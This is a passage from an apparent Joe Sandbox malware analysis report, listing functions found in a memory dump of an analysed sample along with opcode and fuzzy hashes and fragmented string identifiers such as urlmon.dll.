                                                                                                                        • Instruction Fuzzy Hash: 940188B13006846BE610EA55EC45FEF73ADEFD5710F00441AFA099B240D6747911CBA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0502D285 Relevance: .0, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ce50ef4ac5ff3f974d94596ed091564ae278db4f36118869303ec6153950396e
                                                                                                                        • Instruction ID: 87179cd4ca3267b33e05575afa040316bc74e26394f9db4a005fb07251ea39ce
                                                                                                                        • Opcode Fuzzy Hash: ce50ef4ac5ff3f974d94596ed091564ae278db4f36118869303ec6153950396e
                                                                                                                        • Instruction Fuzzy Hash: C111A8B1D15229AF8B50CFA9D48519DBBF8FB09A20F10826BE868E7200E7718651CFD1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0502D44C Relevance: .0, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ac15622d25422d9a6221c71a7f636310695f2035a26e171d8c0a5528f58ceda3
                                                                                                                        • Instruction ID: 7c8b2ce90092919b8b2d5acec57b5fb7d71d3fa6682137421afb011b4eb3c821
                                                                                                                        • Opcode Fuzzy Hash: ac15622d25422d9a6221c71a7f636310695f2035a26e171d8c0a5528f58ceda3
                                                                                                                        • Instruction Fuzzy Hash: BDF07D7391972647D302162DB846BCC7B94EF61110F800A7AEC808F286C35268578791
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504EB54 Relevance: .0, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f12e911e26f4a6b4a849f1f4722be75341e2d5712503af54260f892dc2f018f3
                                                                                                                        • Instruction ID: 78ebd89a6f68a32afc41d96b7ff8b6d376b2f5c2b0c4d3b86f416a68e09362c8
                                                                                                                        • Opcode Fuzzy Hash: f12e911e26f4a6b4a849f1f4722be75341e2d5712503af54260f892dc2f018f3
                                                                                                                        • Instruction Fuzzy Hash: 610180B2215549BBCB54DE99DC80EEB77ADAF8C714F018219BA09E7240DA30F9518BA4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504C924 Relevance: .0, Instructions: 46COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8f9ac809a8f5f00a139709d033a1c9ded0deedd39013e70656d76130b136ffcf
                                                                                                                        • Instruction ID: 04062a315d6a714c97caa52429adc5e701c3a81169005a1ac24b1bde722f3713
                                                                                                                        • Opcode Fuzzy Hash: 8f9ac809a8f5f00a139709d033a1c9ded0deedd39013e70656d76130b136ffcf
                                                                                                                        • Instruction Fuzzy Hash: E901C5B6D01219AE8B40DFE8D944AEEBBF8AB18200F54456AE915F3200E7755A048BA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0502D3E4 Relevance: .0, Instructions: 40COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4fd2d0f7c16246c7d9cd25e5bcc08238a328b21a9c1b3158e58c1324b5c1d211
                                                                                                                        • Instruction ID: 22c704d9866272e7fe0186311543fd3c06fc64683bf5131b82b82d170ec45e73
                                                                                                                        • Opcode Fuzzy Hash: 4fd2d0f7c16246c7d9cd25e5bcc08238a328b21a9c1b3158e58c1324b5c1d211
                                                                                                                        • Instruction Fuzzy Hash: B1F0A7B36042166BD7109A5DFC45F9EB7DCEB84234F240232FE1C8B241E672E85286A0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05040A7D Relevance: .0, Instructions: 36COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7ca011fa3d35fd21fb0c67902e8e013b6c8cdbbf75610d5fda42041093dda2f3
                                                                                                                        • Instruction ID: ba18811647a60deb4f3243a6352761f8154e3a5698e2f0bf1393bd733a7c8296
                                                                                                                        • Opcode Fuzzy Hash: 7ca011fa3d35fd21fb0c67902e8e013b6c8cdbbf75610d5fda42041093dda2f3
                                                                                                                        • Instruction Fuzzy Hash: 8CF0BEA1A5020979EF60EBB0AD8DEBF77ECEB68214F000295ED09A2141D63089848AA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504DEF4 Relevance: .0, Instructions: 33COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3118ccedcad2615fca23ac2fec92cc32b49f0119623b39ca1d540d25aca73a70
                                                                                                                        • Instruction ID: a39fa947f529e49e9889b88bb0a1212dbc955c076f313b811e2db5b0e5ce6922
                                                                                                                        • Opcode Fuzzy Hash: 3118ccedcad2615fca23ac2fec92cc32b49f0119623b39ca1d540d25aca73a70
                                                                                                                        • Instruction Fuzzy Hash: 8BF08CB63006087BCB10DE98EC40EEB73ACEFC8710F008409B918A7240D670B9118BB0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 050409E4 Relevance: .0, Instructions: 29COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1029cde0c8554f9eb23964abdc3a39d2a652f50e6f7f5f338a2ec63165c4f9d7
                                                                                                                        • Instruction ID: f18927dc5d4ebdd443bf06c70b65989079398edfd68662767df0c6bed1f40c31
                                                                                                                        • Opcode Fuzzy Hash: 1029cde0c8554f9eb23964abdc3a39d2a652f50e6f7f5f338a2ec63165c4f9d7
                                                                                                                        • Instruction Fuzzy Hash: 13F082B1C0520CEBDB14DF64E841BDDBBB8EB04320F1083A9E9249B280D63497508B81
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504EA74 Relevance: .0, Instructions: 29COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 12b1db68d580400a64ae763202157b5fca0cc943ed3effe7dac2130023a2e661
                                                                                                                        • Instruction ID: 5e47868b962b07752d774a69fdcbd040a9d34b8555d887dd97ab909713a49fda
                                                                                                                        • Opcode Fuzzy Hash: 12b1db68d580400a64ae763202157b5fca0cc943ed3effe7dac2130023a2e661
                                                                                                                        • Instruction Fuzzy Hash: 80E065B26002487BDA10EE98EC44FEB33ACEF88710F004419F908A7241DA70B9118AB4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 050506B4 Relevance: .0, Instructions: 28COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5f3938ac6c370f1bb25a60828775ebac9557a5a66b9014cc612ced873ed2b9b5
                                                                                                                        • Instruction ID: ab670a80bcb16b6165a436c4e9954a9cd541a3e711471acd93b743d6d0a17962
                                                                                                                        • Opcode Fuzzy Hash: 5f3938ac6c370f1bb25a60828775ebac9557a5a66b9014cc612ced873ed2b9b5
                                                                                                                        • Instruction Fuzzy Hash: 0FE04F3A70021437D620658AAC1DF9F779CEBE1B70F050165FE089B240E570B90482E5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0502D3D9 Relevance: .0, Instructions: 28COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d1e4bcea2da92c0b2e17e0e795a732931d5155077a2cd765f02a4a077f1c6321
                                                                                                                        • Instruction ID: 5775d1de8bba4cb920b682b5545e41d453c06f5a91d838b51498acc49bc871df
                                                                                                                        • Opcode Fuzzy Hash: d1e4bcea2da92c0b2e17e0e795a732931d5155077a2cd765f02a4a077f1c6321
                                                                                                                        • Instruction Fuzzy Hash: F0E0D8734041567A87208A6DFC85CDEF7D8EAC52303214323D5295B251DA329843C6E0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 050409E1 Relevance: .0, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 087e1c6d9f65bb4a55357dca839cbd43e8a5445085b79d2fd1969af5d50b0077
                                                                                                                        • Instruction ID: 20e9be98280b6b42499ff6b2d987f8f710c0048a5764008961a515423180feaa
                                                                                                                        • Opcode Fuzzy Hash: 087e1c6d9f65bb4a55357dca839cbd43e8a5445085b79d2fd1969af5d50b0077
                                                                                                                        • Instruction Fuzzy Hash: FCF065B191510CABDB14DF64E491BADBBB8EB04310F1443B9E918DF280D63597648B91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504E7C4 Relevance: .0, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f36375a869f0fb8424eafcbc6dcbcf7c194bcefb1b484bf14c7f1598789658c8
                                                                                                                        • Instruction ID: 4b94d17c70f4f9a6e060ccd8d53a649ff4201bd8ff9db496ac6a7b0e60f7b084
                                                                                                                        • Opcode Fuzzy Hash: f36375a869f0fb8424eafcbc6dcbcf7c194bcefb1b484bf14c7f1598789658c8
                                                                                                                        • Instruction Fuzzy Hash: 7FE08C763406147BD620EA59DC00FDBB76CEFC5710F004415FA09AB241CA71BA118BF0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0503457B Relevance: .0, Instructions: 5COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ea0f8bda3dc761d90e2c32eb3c3b1161f807dbf881bab4d91cb66ea739b21c8f
                                                                                                                        • Instruction ID: 286d45c6c0e62d60978210a0f84c839d8e0c7bfba7e3e6e886d77bd468a87af4
                                                                                                                        • Opcode Fuzzy Hash: ea0f8bda3dc761d90e2c32eb3c3b1161f807dbf881bab4d91cb66ea739b21c8f
                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Non-executed Functions

                                                                                                                        Function 0503D114 Relevance: 51.4, Strings: 41, Instructions: 166COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                                        • API String ID: 0-3248090998
                                                                                                                        • Opcode ID: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                                                                        • Instruction ID: 7e609f00bedc1c3d1e20412f406b954f263d3ff9677ccdaf3fbed55dce7a4377
                                                                                                                        • Opcode Fuzzy Hash: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                                                                        • Instruction Fuzzy Hash: 969110F08042A88ACB118F55A5603DFBF71BB85204F1581E9C6AA7B203C3BE4E85DF90
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504A9B4 Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                                        • API String ID: 0-1002149817
                                                                                                                        • Opcode ID: a3778e99c8d53876e45f365b2b8fa104b38d299f413687658d27e677b1687a6e
                                                                                                                        • Instruction ID: 4a91020294e1fbd404e86fd114442bc139402dd9870667876c0f3b41e902f477
                                                                                                                        • Opcode Fuzzy Hash: a3778e99c8d53876e45f365b2b8fa104b38d299f413687658d27e677b1687a6e
                                                                                                                        • Instruction Fuzzy Hash: 33C13EB1D0025CAEDF60DFA5DD44BEEBBB9AF55304F008199D54CAB240E7B54A88CFA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05047E74 Relevance: 25.2, Strings: 20, Instructions: 247COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                                                        • API String ID: 0-3236418099
                                                                                                                        • Opcode ID: 0772fda6e1ded1dbc1a74f9904b3a16f05b5f231199923c2f2170ecd5f21eea1
                                                                                                                        • Instruction ID: 1ab9e8c227eefaf455d79907a44abaad0160f0177e38c4b05421551d811c335e
                                                                                                                        • Opcode Fuzzy Hash: 0772fda6e1ded1dbc1a74f9904b3a16f05b5f231199923c2f2170ecd5f21eea1
                                                                                                                        • Instruction Fuzzy Hash: 319142B1D00218AAEB20DF94DC89FEE77BDFF55704F0441A9EA08A6140EB755B89CF61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05047E67 Relevance: 25.1, Strings: 20, Instructions: 98COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                                                        • API String ID: 0-3236418099
                                                                                                                        • Opcode ID: 3af229de2760c1ea113531c902ea5e8c4fbbe2d98837a0944b65bdd1953aa57e
                                                                                                                        • Instruction ID: c5fd0fda9ca91497e32403224d0106cc5ef06c98dff5a6f3757f0a25670b3f07
                                                                                                                        • Opcode Fuzzy Hash: 3af229de2760c1ea113531c902ea5e8c4fbbe2d98837a0944b65bdd1953aa57e
                                                                                                                        • Instruction Fuzzy Hash: C3410BB0D0031C9EEF60DFA59888BEEBBB9FF15748F1041A99508AA241D7B54B88CF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05045A04 Relevance: 24.1, Strings: 19, Instructions: 320COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $)$C$D$E$F$F$G$R$\$a$c$e$g$i$r$r$v$x
                                                                                                                        • API String ID: 0-401266261
                                                                                                                        • Opcode ID: 90572a0f0ce5800b27bae656cf3a353df1470e2becc35c1083e2ed27c486b90e
                                                                                                                        • Instruction ID: 7fd389d06bdedabc3aba2e8e9b6f6d1079e00382229a5140dc0cfc3a79b15c6a
                                                                                                                        • Opcode Fuzzy Hash: 90572a0f0ce5800b27bae656cf3a353df1470e2becc35c1083e2ed27c486b90e
                                                                                                                        • Instruction Fuzzy Hash: 77C164B1D10318AAEB25DFA4DC49FEF7379EF58700F00419DA609A6190EBB15B88CF65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05043DC4 Relevance: 24.0, Strings: 19, Instructions: 252COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: C$D$I$\$a$a$c$e$e$l$n$o$o$r$r$s$s$t$y
                                                                                                                        • API String ID: 0-2101568155
                                                                                                                        • Opcode ID: 1f295feb072f496c80b31de3aedbd3f5ca7b695454eb68267fd5e1516164225a
                                                                                                                        • Instruction ID: 47794de9aa8be1a9553d7212b2fd0cf122b11aab6e2aaf6d5f9007fddb110f88
                                                                                                                        • Opcode Fuzzy Hash: 1f295feb072f496c80b31de3aedbd3f5ca7b695454eb68267fd5e1516164225a
                                                                                                                        • Instruction Fuzzy Hash: 7A9184B1A00218AFEB10DF50DD89FFEB7B9EF54710F048199E908A6241E7B55A44CFA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05045A00 Relevance: 24.0, Strings: 19, Instructions: 227COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $)$C$D$E$F$F$G$R$\$a$c$e$g$i$r$r$v$x
                                                                                                                        • API String ID: 0-401266261
                                                                                                                        • Opcode ID: 0593fd4b4b8c93e193fcc948765629fa579d4a9ee872e526361d38d4413d8a57
                                                                                                                        • Instruction ID: 7170dc46fb27967f8448d9f29bc57b0cbb82a9f27dcfd9bf143a6441b7163829
                                                                                                                        • Opcode Fuzzy Hash: 0593fd4b4b8c93e193fcc948765629fa579d4a9ee872e526361d38d4413d8a57
                                                                                                                        • Instruction Fuzzy Hash: 009142B1D00318AADB65DFA4CC49FEEB7B9FF58700F00419DA50DA6150EBB15A88CF65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05043DB8 Relevance: 24.0, Strings: 19, Instructions: 213COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: C$D$I$\$a$a$c$e$e$l$n$o$o$r$r$s$s$t$y
                                                                                                                        • API String ID: 0-2101568155
                                                                                                                        • Opcode ID: 34fa40b440c0fa48ae463c3257a7a036327894709166639f225e3945de1bdb25
                                                                                                                        • Instruction ID: bfd144bb4b7bfd03984cbf558b411ce2ec55341ac4a4b2aa916cda2b57223e06
                                                                                                                        • Opcode Fuzzy Hash: 34fa40b440c0fa48ae463c3257a7a036327894709166639f225e3945de1bdb25
                                                                                                                        • Instruction Fuzzy Hash: E08163B1A00218AFEB10DF94DC49FFEB7B9EF54714F008099EA08A7241E7B55A45CFA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05048A74 Relevance: 20.1, Strings: 16, Instructions: 86COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: I$O$R$V$_$c$k$l$o$r$r$t$t$u$v$x
                                                                                                                        • API String ID: 0-2161164058
                                                                                                                        • Opcode ID: 8acd5d969bc916414436f70ab1cf9e3a7f61661cafc8d782a6a2db68af441312
                                                                                                                        • Instruction ID: 364bdbeedd115246cb0547a0b043f2c6a6d62e5d0c94a7452f466588be224aca
                                                                                                                        • Opcode Fuzzy Hash: 8acd5d969bc916414436f70ab1cf9e3a7f61661cafc8d782a6a2db68af441312
                                                                                                                        • Instruction Fuzzy Hash: 03313AB0D00218EFEB10DF98D848BEEBBB6BF14314F10415DE918A7241D7B95A48CFA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05048A66 Relevance: 20.1, Strings: 16, Instructions: 83COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: I$O$R$V$_$c$k$l$o$r$r$t$t$u$v$x
                                                                                                                        • API String ID: 0-2161164058
                                                                                                                        • Opcode ID: ceac907d0bbcb80befb0d2227f823fe237370aef5d820813061726b429d9f8de
                                                                                                                        • Instruction ID: bfe7c0d5036dd4e898c22567a3a94a1675d709f27f77404640cdd365fab114c4
                                                                                                                        • Opcode Fuzzy Hash: ceac907d0bbcb80befb0d2227f823fe237370aef5d820813061726b429d9f8de
